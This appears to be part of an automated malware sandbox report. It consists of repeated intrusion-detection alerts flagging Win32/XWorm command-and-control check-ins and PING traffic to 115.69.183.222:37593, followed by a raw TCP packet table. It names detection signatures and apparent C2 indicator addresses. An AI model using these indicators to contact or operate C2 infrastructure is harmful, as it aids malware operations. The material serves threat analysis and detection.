                                                                              2024-12-10T10:05:23.567924+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.687430+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.687430+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.802604+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.802604+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.922164+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.922164+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.045611+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.045611+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.165329+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.165329+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.284666+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.284666+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.399411+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.399411+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.530557+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.530557+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.659984+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.659984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.779401+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.779401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.898961+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:24.898961+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.018450+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.018450+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.137856+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.137856+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.359880+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.359880+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.479548+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.479548+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.601845+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.601845+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.721165+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.721165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.842004+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.842004+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.929310+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:25.929310+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.049097+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.049097+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.169325+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.169325+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.204070+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449751115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.288740+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.288740+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.527682+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.527682+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.647074+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.647074+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.747572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:26.758670+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449751115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.876964+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:26.876964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.011248+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.011248+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.146818+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.146818+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.269718+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.269718+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.390329+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.390329+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.596782+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.596782+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.862581+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.862581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.982094+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.982094+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.142483+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.142483+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.261891+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.261891+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.382436+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.382436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.624004+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.624004+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.789710+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.789710+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.911765+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.911765+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.031215+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.031215+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.152823+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.152823+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.257744+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.257744+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.273973+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.273973+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.393724+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.393724+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.513756+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.513756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.633791+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.633791+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.753195+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.753195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.838493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:29.899277+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.899277+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 10, 2024 10:03:59.502701044 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:03:59.622215033 CET8049730208.95.112.1192.168.2.4
                                                                              Dec 10, 2024 10:03:59.622303963 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:03:59.623087883 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:03:59.742539883 CET8049730208.95.112.1192.168.2.4
                                                                              Dec 10, 2024 10:04:00.782250881 CET8049730208.95.112.1192.168.2.4
                                                                              Dec 10, 2024 10:04:00.828752995 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:04:52.726892948 CET8049730208.95.112.1192.168.2.4
                                                                              Dec 10, 2024 10:04:52.727813959 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:04:57.066165924 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:57.066205978 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:57.066271067 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:57.075794935 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:57.075807095 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:58.292967081 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:58.293086052 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:58.307934046 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:58.307954073 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:58.308222055 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:58.360033035 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:58.405805111 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:58.451325893 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:59.103619099 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:59.103718042 CET44349739104.20.3.235192.168.2.4
                                                                              Dec 10, 2024 10:04:59.103923082 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:59.110546112 CET49739443192.168.2.4104.20.3.235
                                                                              Dec 10, 2024 10:04:59.247281075 CET4973080192.168.2.4208.95.112.1
                                                                              Dec 10, 2024 10:04:59.366570950 CET8049730208.95.112.1192.168.2.4
                                                                              Dec 10, 2024 10:04:59.391567945 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:04:59.391617060 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:04:59.391906977 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:04:59.392225027 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:04:59.392241955 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:00.764673948 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:00.764769077 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:05:00.766663074 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:05:00.766673088 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:00.766931057 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:00.768362999 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:05:00.815337896 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:01.393793106 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:01.393867970 CET44349745149.154.167.220192.168.2.4
                                                                              Dec 10, 2024 10:05:01.393949986 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:05:01.397095919 CET49745443192.168.2.4149.154.167.220
                                                                              Dec 10, 2024 10:05:01.525624037 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:01.644989014 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:01.645080090 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:01.678503036 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:01.797866106 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:13.940135956 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:14.059464931 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:14.455517054 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:14.479696035 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:14.599076033 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.227536917 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.229984045 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.350052118 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909744978 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909771919 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909782887 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909806013 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909815073 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909830093 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909841061 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.909847021 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.909885883 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.910018921 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.910038948 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.910121918 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.918282986 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.918520927 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.918586969 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:19.926767111 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:19.969405890 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.102238894 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.102252960 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.102319002 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.147571087 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.266871929 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.267005920 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.269109964 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.388293028 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.388437986 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.507976055 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.508838892 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.629189014 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.629374027 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.748754978 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.748806000 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.868148088 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.868343115 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:20.988327026 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:20.988429070 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.108072042 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.109746933 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.229079962 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.229754925 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.349042892 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.349750996 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.469055891 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.469249964 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.588655949 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.588748932 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.708129883 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.709749937 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.829145908 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.829229116 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.917784929 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:21.917850018 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:21.948771000 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.028538942 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.037168026 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.148083925 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.148168087 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.148175001 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.148302078 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.148339033 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.148431063 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.268975019 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.269031048 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.388403893 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.388499022 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.507941961 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.507997036 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.617818117 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.617873907 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.627391100 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.646011114 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.746433973 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.746511936 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.765590906 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.765666962 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.765712023 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.765877962 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.765887976 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.865884066 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.865936041 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.882124901 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.922540903 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:22.985328913 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:22.985380888 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.105046034 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.105359077 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.208024979 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.208331108 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.225627899 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.238542080 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.328279972 CET3759349797115.69.183.222192.168.2.4
